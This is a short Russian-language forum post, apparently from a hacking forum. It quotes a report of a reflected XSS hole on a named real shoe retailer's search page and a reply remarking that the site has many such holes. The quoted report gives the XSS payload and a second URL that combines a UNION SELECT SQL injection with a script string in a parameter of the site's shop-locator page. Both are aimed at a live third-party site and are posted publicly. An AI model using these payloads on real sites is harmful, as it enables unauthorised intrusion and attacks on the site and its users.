29.08.2015, 12:02
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от SaNDER
SaNDER said:
↑
Target:http://www.ecco-shoes.ru/search
Type:XSS-Reflected
Описание: Переходим в любой раздел "Для мужчин/женщин" . Ищем поиск по артиклу и вбиваем в оба поля .
Код:
Code:
">alert('Hello') .
а также
Код:
Code:
www.ecco-shoes.ru/shops/?country=UNION SELECT 1,2,3,'alert('SIXSS')',5,6 --®ion=Архангельская+область&town=Архангельск
Да и вообще на этом сайте много XSS .последнее это что?
|
|
|